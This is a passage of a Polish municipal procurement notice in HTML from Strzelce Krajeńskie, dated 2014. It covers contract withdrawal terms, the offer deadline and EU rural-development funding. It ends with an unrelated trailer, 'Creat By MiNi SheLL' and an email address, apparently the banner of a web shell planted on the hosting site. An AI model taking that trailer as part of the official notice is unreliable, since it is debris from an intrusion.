b) jeżeli Wykonawca wykonuje swoje obowiązki w sposób nienależyty i pomimo pisemnego wezwania Zamawiającego w terminie 7 dni nie nastąpiła poprawa                              w wykonaniu tych obowiązków. Po bezskutecznym upływie wyznaczonego terminu Zamawiający może od umowy odstąpić albo naliczyć kary zgodnie z § 11 ust.1 lit.b) umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzelce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 	Al. Wolności 48 66-500 Strzelce Kraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 13:00, miejsce: Ofertę w formie i treści zgodnej z niniejszą SIWZ należy złożyć w Urzędzie Miejskim w Strzelcach Kraj., Al. Wolności 48, 66-500 Strzelce Kraj. w punkcie informacyjnym (biuro nr 3 na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy  w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com